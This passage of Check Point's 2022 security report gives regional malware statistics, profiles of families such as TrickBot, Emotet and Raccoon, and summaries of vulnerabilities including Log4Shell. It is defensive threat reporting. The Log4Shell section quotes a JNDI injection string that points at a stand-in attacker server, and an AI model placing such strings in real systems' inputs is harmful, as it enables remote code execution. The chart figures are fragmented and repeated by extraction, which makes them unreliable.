CYBER ATTACK CATEGORIES BY REGION
Figure 1: Percentage of corporate networks attacked by each malware type globally.
Figure 2: Percentage of corporate networks attacked by each malware type in the Americas.
31%
21%
19%
19%
14%
8%
BOTNET
INFOSTEALER
CRYPTOMINERS
BANKING
MOBILE
RANSOMWARE
BOTNET
INFOSTEALER
CRYPTOMINERS
BANKING
MOBILE
RANSOMWARE
25%
18%
15%
15%
14%
6%
35CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
36CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
CYBER ATTACK CATEGORIES BY REGION
EMEA
APAC
Figure 3: Percentage of corporate networks attacked by each malware type in EMEA.
Figure 4: Percentage of corporate networks attacked by each malware type in APAC.
BOTNET
INFOSTEALER
CRYPTOMINERS
BANKING
MOBILE
RANSOMWARE
30%
23%
19%
19%
14%
8%
BOTNET
INFOSTEALER
CRYPTOMINERS
BANKING
MOBILE
RANSOMWARE
43%
30%
25%
25%
13%
10%
36CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
37CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 37CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
GLOBAL THRE AT INDE X MAP
Figure 5. Global Threat Index Map
The map displays the cyber threat risk index globally, demonstrating the main risk areas around the world.*
* Darker = Higher Risk * Grey = Insufficient Data
C H A P T E R 5
38CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 38CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
1605 (+75%)Education / Research Government / Military
Communications
ISP / MSP
Healthcare
SI / VAR / Distributor
Utilities
Manufacturing
Finance / Banking
Insurance / Legal
Leisure / Hospitality
Consultant
Software Vendor
Retail / Wholesale
Transportation
Hardware Vendor
1136 1079 1068
830 778
736 704 703
636 595
576 536
526 501
367
(+47%)
(+51%)
(+67%)
(+71%)
(+18%)
(+46%)
(+41%)
(+53%)
(+68%)
(+40%)
(+73%)
(+146%)
(+39%)
(+34%)
(+16%)
Figure 6: Average weekly attacks per organization by Industry 2021, compared to 2020.
During 2021, global cyber attacks against corporate networks has increased by
50%, in comparison to 2020. The “Education/Research” category leads as the most
targeted sector, with an average of 1,605 attacks per organization every week
(75% increase), while the “Software Vendor” category shows the largest year-
on-year growth, with an increase of 146%. The rise in attacks against software
vendors goes hand-in-hand with the ever-growing trend of software supply chain
attacks observed during 2021.
C H A P T E R 5
39CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 39CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
TOP MALICIOUS FILE T YPES – WEB VS. EMAIL
Figure 7: Web – Top malicious file types.
Figure 8: Email – Top malicious file types.
ex e
pd f
do c xls xls
x jar ba t
do cx ps
1 ap
k ot
he r
52%
20%
5% 3% 3% 2% 2% 1% 1% 1%
10%
ex e
xlx s
pd f rtf do
c xls
m do
cx xls xls b
pp t
ot he
r
34%
16%
9% 7% 7% 6% 6% 5%
3% 2%
6%
C H A P T E R 5
40CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 40CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 9: Distribution protocols – email vs web attack vectors during 2019, 2020 & 2021.
64%
36%
83%
17%
84%
16%
EMAIL WEB
2019 2020 2021
The charts above indicate that the email attack
vector has steadily established itself as a
favorite, compared to slowly diminishing use of
websites to distribute malware payloads since
the beginning of 2020.
Whether used in a targeted attack, or as part
of an opportunistic campaign by a novice
attacker, email-based attacks allow for the
easy distribution of malware to a wide array of
targets and corporations.
One of the reasons for this rise in email-based
attacks is the massive number of high-profile
campaigns sponsored and run by large crime
groups, who distribute the most prominent
malware families today, such as TrickBot,
Dridex, Qbot, IcedID, or Emotet.
Once these gangs realized the effectiveness
of spam campaigns with malicious Office
document attachments, they used it almost
exclusively as their main infection vector into
new networks.
C H A P T E R 5
41CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 41CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
TOP MALWARE FAMILIES
Figure 10: Most prevalent malware globally. Percentage of corporate networks attacked by each malware family.
Figure 11: Most prevalent malware in the Americas.
AMERICAS
Tr ick
bo t
Qb ot
Fo rm
bo ok
Em ot
et
Dr id
ex
Ag en
tT es
la
Ph or
pi ex
Re m
co s
Gl up
te ba
XM Ri
g
11.0%
5.2% 5.0% 4.9% 4.4% 4.1% 4.0% 4.0% 3.7% 3.5%
GLOBAL
Tr ick
bo t
Re m
co s
Fo rm
bo ok
Ph or
pi ex
Dr id
ex
Em ot
et Qb
ot
Gl up
te ba
XM Ri
g
Ra cc
oo n
9.7%
3.6% 3.5% 3.5% 3.0% 3.0% 2.9% 2.6% 2.4% 2.4%
GLOBAL MALWARE STATISTICS Data comparisons presented in the following sections of this report are based on data drawn from the Check Point ThreatCloud Cyber Threat Map between January and December 2021.
For each of the regions below, we present the most prevalent malware.
C H A P T E R 5
https://threatmap.checkpoint.com/ThreatPortal/livemap.html
42CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 42CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 12: Most prevalent malware in EMEA.
EUROPE, MIDDLE EAST AND AFRICA (EMEA)
Figure 13: Most prevalent malware in APAC.
ASIA PACIFIC (APAC)
Tr ick
bo t
Qb ot
Em ot
et
Dr id
ex
Fo rm
bo ok
Ag en
tT es
la
Re m
co s
Ph or
pi ex
XM Ri
g
Gl up
te ba
10.8%
7.8%
5.9% 5.4% 5.0% 4.7%
4.2% 3.6% 3.6% 3.3%
Tr ick
bo t
Fo rm
bo ok
Ra m
ni t
Gl up
te ba
Ag en
tT es
la
Ph or
pi ex
Em ot
et
XM Ri
g
Dr id
ex
Ur sn
if
14.5%
7.8% 7.5% 7.1% 6.9% 6.2% 6.0% 5.7%
4.8% 4.8%
C H A P T E R 5
43CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 43CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
GLOBAL ANALYSIS OF TOP MALWARE Some noticeable changes since our last yearly global malware ranking, are that
RigEK (Exploit Kit) and LokiBot infostealer are no longer present in our top 10,
replaced by Glupteba botnet and Remcos RAT.
TrickBot rose to the top of the chart in February, replacing Emotet, and kept this
ranking for the rest of 2021. TrickBot is a modular Botnet and Banking Trojan
that targets the Windows operating system. It is credited with Emotet’s revival
in November 2021 as it was found distributing its fellow malware. TrickBot is
constantly being updated with enhanced capabilities, features and distribution
vectors, making it a flexible and customizable malware that can be distributed
as part of multi-purpose campaigns. It served as a popular means for initial
access in targeted attacks followed by malware such as Ryuk, Conti or Bazar.
Despite TrickBot’s brief takedown in October 2020, it remained prominent in our
top malware charts throughout 2021, and was involved in one of the most serious
ransomware attacks of the year, a Conti ransomware attack on Ireland’s Health
Service Executive.
Phorpiex is a botnet which at its peak controlled more than a million infected
hosts. It is known for distributing other malware families via spam campaigns as
well as fueling large-scale spam, sextortion campaigns or ransomware spread.
Phorpiex, which hit its low mid-year, ended up with a higher ranking by the end of
2021 than it had a year ago. In December, Check Point Research spotted Phorpiex’s
resurgence with a brand-new variant called “Twizt”, which enabled it to operate
in peer-to-peer mode without active C&C servers. In one year, Phorpiex bots successfully hijacked 969 transactions and stole 3.64 Bitcoin, 55.87 Ether, and US$
55,000 in ERC20 tokens accounting for almost half a million US dollars.
C H A P T E R 5
https://blog.checkpoint.com/2021/03/11/february-2021s-most-wanted-malware-trickbot-takes-over-following-emotet-shutdown/ https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://threatpost.com/emotet-resurfaces-trickbot/176362/ https://www.raconteur.net/technology/the-five-most-important-ransomware-attacks-of-2021/ https://www.raconteur.net/technology/the-five-most-important-ransomware-attacks-of-2021/ https://research.checkpoint.com/2019/in-the-footsteps-of-a-sextortion-campaign/ https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/
44CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 44CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 14: Most prevalent botnets globally
Figure 16: Most prevalent botnets in EMEA
GLOBAL
Figure 15: Most prevalent botnets in the Americas
Figure 17: Most prevalent botnets in APAC
AMERICAS
EUROPE, MIDDLE EAST AND AFRICA (EMEA) ASIA PACIFIC (APAC)
35%
12% 11%
11%
10%
27%
19% 15%
13%
9%
8%
29%
14%
13% 12%
12%
TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other
11% 10%
27%
13%
11%11%
9%
23%
10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other
10%
9%
6%
35%
12% 11%
11%
10%
27%
19% 15%
13%
9%
8%
29%
14%
13% 12%
12%
TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other
11% 10%
27%
13%
11%11%
9%
23%
10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other
10%
9%
6%
35%
12% 11%
11%
10%
27%
19% 15%
13%
9%
8%
29%
14%
13% 12%
12%
TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other
11% 10%
27%
13%
11%11%
9%
23%
10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other
10%
9%
6%
35%
12% 11%
11%
10%
27%
19% 15%
13%
9%
8%
29%
14%
13% 12%
12%
TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other
11% 10%
27%
13%
11%11%
9%
23%
10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other
TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other
10%
9%
6%
TOP BOTNE TS
C H A P T E R 5
45CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 45CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
BOTNET GLOBAL ANALYSIS Overall, we are seeing the same malware families in our top global botnet charts
as 2020, with minor changes to the prevalence of each family. Dridex, for example,
went down from second to fourth place whereas TrickBot rose to first place.
Emotet, one of the most infamous malware groups, has been operating in intervals
since 2014, first as a banking trojan and then later as a botnet. It now appears in
the number three spot on the top botnet chart. Emotet was wide-spread before its
takedown in January 2021, affecting more than 1.5 million machines globally with
damages estimated at around US$ 2.5 billion. It is notorious for spreading other
malware families including TrickBot, Qbot and more.
The Botnet marketplace this year was drastically affected by Emotet’s downfall.
Emotet is one of the largest PC botnet operations and its absence left a vacuum
filled by TrickBot, IcedID, and more recently Phorpiex. On November 15, just
10 months after its takedown, machines infected with TrickBot started to drop
Emotet samples. Computers were increasingly compromised by a large malspam
campaign which leveraged malicious documents containing the Emotet payload.
We note that both our H1 2021 and global 2021 charts showed Emotet in the top
three places, despite nine months of no activity — a tribute to its unequaled power.
C H A P T E R 5
https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/
46CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 46CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 18: Top infostealer malware globally
Figure 20: Top infostealer malware in EMEA
GLOBAL
Figure 19: Top infostealer malware in the Americas
Figure 21: Top infostealer malware in APAC
AMERICAS
EUROPE, MIDDLE EAST AND AFRICA (EMEA) ASIA PACIFIC (APAC)
18%
12%
10%
8%6%
14%
13%
9%
8% 7%7%
Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other
Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other
7%
18%
16%
11% 8%7%
33%
16%
13%
9%
9%
38%
8%7%
Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other
Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other
39%
42%
7%
18%
12%
10%
8%6%
14%
13%
9%
8% 7%7%
Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other
Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other
7%
18%
16%
11% 8%7%
33%
16%
13%
9%
9%
38%
8%7%
Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other
Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other
39%
42%
7%
18%
12%
10%
8%6%
14%
13%
9%
8% 7%7%
Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other
Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other
7%
18%
16%
11% 8%7%
33%
16%
13%
9%
9%
38%
8%7%
Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other
Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other
39%
42%
7%
18%
12%
10%
8%6%
14%
13%
9%
8% 7%7%
Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other
Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other
7%
18%
16%
11% 8%7%
33%
16%
13%
9%
9%
38%
8%7%
Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other
Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other
39%
42%
7%
TOP INFOSTE ALER MALWARE
C H A P T E R 5
47CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 47CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
INFOSTEALER MALWARE GLOBAL ANALYSIS The infostealer landscape is still dominated by several stealthy malware families.
AgentTesla, a prominent commodity infostealer first discovered in 2014, showed a
significant decrease in prominence compared to 2020, with a drop of 50%. LokiBot,
a commodity infostealer that emerged in 2016, experienced a similar decrease.
Topping the chart is Formbook, a commodity infostealing malware sold as-a-
service on underground forums since 2016. The malware is designed to collect
information via keylogging. In mid-2021, a new Formbook variant was detected
in the wild. The variant was distributed in a phishing campaign leveraging
PowerPoint documents as email attachments for malware delivery.
Another malware-as-a-service that entered our top malware statistics for the
first time is Raccoon. This infostealer, sold on the Dark Web for at least two years,
offers a well-maintained platform for its affiliates that features rapid bug fixes
and automated updates to its payload, as well as malware installed on victim
machines.
Raccoon’s recent updates include the ability to steal cryptocurrency, drop further
malware, and spread via Google SEO instead of phishing emails. The current
campaign attempts to lure its victims by offering cracked software licenses.
C H A P T E R 5
https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/ https://threatpost.com/raccoon-stealer-google-seo/168301/
48CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 48CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 22: Top cryptomining malware globally
Figure 24: Top cryptomining malware in EMEA
GLOBAL
Figure 23: Top cryptomining malware in the Americas
Figure 25: Top cryptomining malware in APAC
AMERICAS
EUROPE, MIDDLE EAST AND AFRICA (EMEA) ASIA PACIFIC (APAC)
50%
12%
7%
41%
5%5%4%3%
43%
8%6%
XMRig LemonDuck RubyMiner DarkGate Kinsing Other
XMRig LemonDuck WannaMine NRSMiner RubyMiner Other
2%
6%
43%
15%
13%
8%
15%
4%
XMRig LemonDuck RubyMiner WannaMine NRSMiner Other
XMRig RubyMiner LemonDuck DarkGate Kinsing Other
27%
42%
6%
33%
2% 50%
12%
7%
41%
5%5%4%3%
43%
8%6%
XMRig LemonDuck RubyMiner DarkGate Kinsing Other
XMRig LemonDuck WannaMine NRSMiner RubyMiner Other
2%
6%
43%
15%
13%
8%
15%
4%
XMRig LemonDuck RubyMiner WannaMine NRSMiner Other
XMRig RubyMiner LemonDuck DarkGate Kinsing Other
27%
42%
6%
33%
2% 50%
12%
7%
41%
5%5%4%3%
43%
8%6%
XMRig LemonDuck RubyMiner DarkGate Kinsing Other
XMRig LemonDuck WannaMine NRSMiner RubyMiner Other
2%
6%
43%
15%
13%
8%
15%
4%
XMRig LemonDuck RubyMiner WannaMine NRSMiner Other
XMRig RubyMiner LemonDuck DarkGate Kinsing Other
27%
42%
6%
33%
2%
50%
12%
7%
41%
5%5%4%3%
43%
8%6%
XMRig LemonDuck RubyMiner DarkGate Kinsing Other
XMRig LemonDuck WannaMine NRSMiner RubyMiner Other
2%
6%
43%
15%
13%
8%
15%
4%
XMRig LemonDuck RubyMiner WannaMine NRSMiner Other
XMRig RubyMiner LemonDuck DarkGate Kinsing Other
27%
42%
6%
33%
2%
TOP CRYPTOMINING MALWARE
C H A P T E R 5
49CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 49CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
CRYPTOMINERS GLOBAL ANALYSIS XMRig, a legitimate Monero mining tool that was leveraged by threat actors for
malicious purposes, not only continues to top the Cryptominer chart, but also rose
in popularity by over 25% compared to 2020. Two malware families entered the
cryptominer chart for the first time this year: LemonDuck, which is already second
to XMRig, and CryptoBot.
LemonDuck, which showed an over 50% growth in attack rate compared to the
mid-year statistics, is a self-propagating cryptomining botnet that features
credential theft, detection evasion and lateral movement capabilities. LemonDuck
also functions as a malware downloader, and is often observed dropping the
Ramnit Trojan.
CryptoBot is an advanced cryptominer that collects the victim’s wallet and
account information upon infection. In December CryptoBot was observed in a
campaign that targets users with a pirated copy of the Windows operating system.
The campaign leverages a designated activation tool called KMSPico that tricks
Windows Key Management Services (KMS) into authenticating a pirated copy of
Windows as legitimate. When a user downloads a compromised version of the tool,
CryptoBot is silently installed using background processes. Similar to LemonDuck,
CyptoBot was previously detected utilizing the EternalBlue exploit as part of its
infection chain.
C H A P T E R 5
https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ https://www.moneycontrol.com/news/technology/hackers-target-windows-pirates-with-cryptobot-malware-7806771.html https://redcanary.com/blog/kmspico-cryptbot/ https://www.izoologic.com/2020/02/01/cryptobot-derived-from-famous-malwares-attacking-asian-countries/
50CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 50CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 26: Most prevalent banking Trojans globally
Figure 28: Most prevalent banking Trojans in EMEA
GLOBAL
Figure 27: Most prevalent banking Trojans in the Americas
Figure 29: Most prevalent banking Trojans in APAC
AMERICAS
EUROPE, MIDDLE EAST AND AFRICA (EMEA) ASIA PACIFIC (APAC)
36%
11% 11%
9%
5%
26%
19%
13% 8%
7%
5%
30%
14%
12%
21%
TrickBot Qbot Dridex IcedID Ursnif Ramnit Other
TrickBot Ramnit Dridex Ursnif Qbot IcedID Other
7%
8%
31%
16% 11%
10%
7%
21%
8%
TrickBot Qbot Dridex Ursnif Ramnit IcedID Other
TrickBot Dridex Qbot Ursnif IcedID Zloader Other
21%
22%
4%
7% 36%
11% 11%
9%
5%
26%
19%
13% 8%
7%
5%
30%
14%
12%
21%
TrickBot Qbot Dridex IcedID Ursnif Ramnit Other
TrickBot Ramnit Dridex Ursnif Qbot IcedID Other
7%
8%
31%
16% 11%
10%
7%
21%
8%
TrickBot Qbot Dridex Ursnif Ramnit IcedID Other
TrickBot Dridex Qbot Ursnif IcedID Zloader Other
21%
22%
4%
7%
36%
11% 11%
9%
5%
26%
19%
13% 8%
7%
5%
30%
14%
12%
21%
TrickBot Qbot Dridex IcedID Ursnif Ramnit Other
TrickBot Ramnit Dridex Ursnif Qbot IcedID Other
7%
8%
31%
16% 11%
10%
7%
21%
8%
TrickBot Qbot Dridex Ursnif Ramnit IcedID Other
TrickBot Dridex Qbot Ursnif IcedID Zloader Other
21%
22%
4%
7%
36%
11% 11%
9%
5%
26%
19%
13% 8%
7%
5%
30%
14%
12%
21%
TrickBot Qbot Dridex IcedID Ursnif Ramnit Other
TrickBot Ramnit Dridex Ursnif Qbot IcedID Other
7%
8%
31%
16% 11%
10%
7%
21%
8%
TrickBot Qbot Dridex Ursnif Ramnit IcedID Other
TrickBot Dridex Qbot Ursnif IcedID Zloader Other
21%
22%
4%
7%
TOP BANKING TROJANS
C H A P T E R 5
51CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 51CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
BANKING TROJANS GLOBAL ANALYSIS The banking malware landscape continues to be dominated by a collection of
stealthy, adaptive malware families over the past few years. TrickBot climbed from
second place to the top of the global ranks, while Dridex fell from first place to
third, and is down by almost 60% compared to 2020.
Qbot is an ever-evolving banking malware initially designed to collect banking
credentials and keystrokes. It features worm capabilities but also functions as
a botnet, often used by ransomware campaigns to drop malware on infected
devices. In September, Qbot resumed its operations following a three-month
break, executing a large-scale spam campaign that leveraged the malware as a
botnet and infostealer and distributed the ‘SquirrelWaffle’ malware loader. The
recent campaign relied on Visual Basic and Excel 4.0 macros. In November, the
monetization stage of the campaign was observed, as the malware dropper began
installing the Conti Ransomware.
Dridex, yet another banking malware that now features infostealer and botnet
capabilities, showed a significant decrease this year. However, in September
researchers detected a new Dridex variant, with extended information collection
capabilities, spreading in a phishing campaign that features specially crafted Excel
documents. In addition, in December, Dridex was among the first malware to be
distributed in a campaign that exploits the Log4j vulnerability for infection.
C H A P T E R 5
https://cisomag.eccouncil.org/qbot-malware-attack/ https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/
52CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 52CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 30: Top mobile malware globally
Figure 32: Top mobile malware in EMEA
GLOBAL
Figure 31: Top mobile malware in the Americas
Figure 33: Top mobile malware in APAC
AMERICAS
EUROPE, MIDDLE EAST AND AFRICA (EMEA) ASIA PACIFIC (APAC)
26%
11%10%
14%
39%
29%
17% 13%
7%
Hiddad xHelper AlienBot FluBot Other
Hiddad xHelper AlienBot FluBot Other
44%
18%
16%
20%
Hiddad xHelper AlienBot FluBot Other
2%34%
xHelper Hiddad AlienBot FluBot Other
30%
16% 11%
3%
40%26%
11%10%
14%
39%
29%
17% 13%
7%
Hiddad xHelper AlienBot FluBot Other
Hiddad xHelper AlienBot FluBot Other
44%
18%
16%
20%
Hiddad xHelper AlienBot FluBot Other
2%34%
xHelper Hiddad AlienBot FluBot Other
30%
16% 11%
3%
40%
26%
11%10%
14%
39%
29%
17% 13%
7%
Hiddad xHelper AlienBot FluBot Other
Hiddad xHelper AlienBot FluBot Other
44%
18%
16%
20%
Hiddad xHelper AlienBot FluBot Other
2%34%
xHelper Hiddad AlienBot FluBot Other
30%
16% 11%
3%
40%
26%
11%10%
14%
39%
29%
17% 13%
7%
Hiddad xHelper AlienBot FluBot Other
Hiddad xHelper AlienBot FluBot Other
44%
18%
16%
20%
Hiddad xHelper AlienBot FluBot Other
2%34%
xHelper Hiddad AlienBot FluBot Other
30%
16% 11%
3%
40%
TOP MOBILE MALWARE
C H A P T E R 5
53CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 53CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
MOBILE MALWARE GLOBAL ANALYSIS Hiddad, an Android malware designed to display ads, previously leveraged the
Covid-19 theme and maintained its place at the top of the ranks, together with
xHelper, whose share of the malware pie decreased by 25% compared to 2020.
This year, two other malware families made it to the chart for the first time, joined
by two brand new malware families: AlienBot and FluBot.
AlienBot is an Android banking malware distributed by threat actors as Malware-
as-a-Service. The malware enables an attacker to remotely inject arbitrary code
into legitimate financial applications, thus gain access to the victims' financial
accounts and eventually completely control their device. In March, Check Point
Research detected a new dropper called ‘Clast82’ distributed via the Google Play
Store that installs AlienBot on victims’ machines. The dropper utilizes a number of
techniques to avoid detection by Google Play Protect. For example, non-malicious
payload is dropped during the evaluation period, and after it passes, the payload is
changed to AlienBot.
FluBot, another Android banking malware, emerged in late 2020, targeting
European users and spreading via SMS messages sent from infected devices.
FluBot campaigns rely on creative themes; a campaign that targeted Finnish
users in June and November leveraged a voicemail theme, asking its victims from
a mobile carrier’s link to listen to messages. Ironically, a campaign aimed at
New Zealand users features a fake security update warning the victims of
FluBot infections.
C H A P T E R 5
https://research.checkpoint.com/2020/covid-19-goes-mobile-coronavirus-malicious-applications-discovered/ https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/ https://threatpost.com/flubot-malware-targets-androids-with-fake-security-updates/175276/ https://www.bleepingcomputer.com/news/security/finland-warns-of-flubot-malware-heavily-targeting-android-users/ https://www.bleepingcomputer.com/news/security/flubot-android-malware-now-spreads-via-fake-security-updates/
54CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 54CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
C H A P T E R 6
HIGH PROFILE GLOBAL VULNERABILITIES
06
MANY VULNERABILITIES DISCOVERED IN 2017 MAINTAINED A STRONG PRESENCE THROUGHOUT 2021 OVERSHADOWING THE NEWLY DISCOVERED ONES
55CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 55CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
The following list of top vulnerabilities is based on data collected by the Check
Point Intrusion Prevention System (IPS) sensor net and details some of the most
popular and interesting attack techniques and exploits observed by Check Point
researchers in 2021.
‘LOG4SHELL’ APACHE LOG4J - REMOTE CODE EXECUTION (CVE-2021-44228) Apache Log4j is an open-source Java-based logging package provided by the
Apache Software Foundation, as part of the Apache Logging Services. It is the
most popular Java logging library, used by millions of Java-based applications
worldwide to record activities such as routine system operations and error
messages and to send diagnostics to system admins. On December 9, the Apache
Foundation released an emergency Log4j version to address a critical flaw in the
logging framework. This flaw enables threat actors to compromise a machine by
sending it a simple string such as ‘${jndi:ldap://attacker_server/path}’ as part of
the HTTP request, User-Agent or any other input likely being logged by the server
using Log4j. By controlling the messages logged via the logging package, arbitrary
code could be executed from a remote server. Called ‘Log4Shell’, the vulnerability
took the security community by storm due to its far-reaching effects on millions
of companies, including Cisco, Twitter, Cloudflare, Tesla, Amazon and Apple, that
use Log4j. Widespread exploitation of the flaw was observed almost immediately,
both by low skilled attackers to distribute cryptominers, as well as by state
sponsored APT groups, to gain access to corporate networks. According to Check
Point Research approximately 48.3% of organizations were affected by exploitation
attempts of the Log4Shell Vulnerability in 2021.
C H A P T E R 6
https://logging.apache.org/log4j/2.x/index.html https://logging.apache.org/log4j/2.x/security.html https://research.checkpoint.com/2021/the-laconic-log4shell-faq/ https://www.wired.com/story/log4j-log4shell/ https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/ https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
56CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 56CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
“PROXYLOGON” MICROSOFT EXCHANGE SERVER - AUTHENTICATION BYPASS (CVE-2021-26855) ProxyLogon is the name given by researchers from DEVCORE to an authentication
bypass vulnerability (CVE-2021-26855) first discovered and reported in late 2020.
When combined with other vulnerabilities (CVE-2021-26857, CVE-2021-26858,
CVE-2021-27065), this infection chain can lead to remote code execution on any
unpatched mainstream Exchange Server. ProxyLogon has been exploited in the
wild by several APT groups. In August, Earth Baku launched a campaign in the
Indo-Pacific region using SQL injection and exploiting ProxyLogon as entry vectors.
In September, the FamousSparrow cyberespionage group exploited the flaw as well
as backdoor SparrowDoor on hotel chains, governments, private businesses and
various other sectors worldwide. Another threat group, SquirrelWaffle, was seen
hacking Microsoft Exchange servers with ProxyShell and ProxyLogon to spread
malware through malicious emails.
ATLASSIAN CONFLUENCE - REMOTE CODE EXECUTION (CVE-2021-26084) This critical Remote Code Execution in Atlassian Confluence Server or Confluence
Data Center flaw, made public in August 2021, is derived from the Object Graph
Navigation Language. It can be exploited without authentication, allowing a
remote attacker to execute arbitrary code on the affected system. Atlassian
released patches for the affected enterprises and several Proof of Concept exploits
were published. Threat actors subsequently scanned for the vulnerability with the
aim of installing cryptominers. In September, the z0Miner cryptojacker attempted
to conduct mining operations on vulnerable machines. In October, the Atom Silo
ransomware operator was observed exploiting unpatched computers to launch
ransomware attacks.
C H A P T E R 6
https://proxylogon.com/ https://gbhackers.com/earth-baku-apt-hackers/ https://www.darkreading.com/threat-intelligence/famoussparrow-apt-group-flocks-to-hotels-governments-businesses https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://cyberintelmag.com/cloud-security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/ https://www.zdnet.com/article/this-cryptocurrency-miner-is-exploiting-the-new-confluence-remote-code-execution-bug/ https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/
57CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 57CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 34: Percentage of attacks leveraging vulnerabilities by Disclosure Year in 2021.
2021
2020
2019
2018
2017
2016
2015
2014
2013
2012
2011
Earlier
0 5 10 15 20
2%
11%
5%
12%
17%
7%
8%
10%
6%
8%
3%
11%
Many vulnerabilities discovered in 2017 maintained a strong presence throughout
2021. This is mostly due to popular flaws like the Apache Struts2 Remote Code
Execution (CVE-2017-5638), which is incorporated into the Mirai botnet, or the
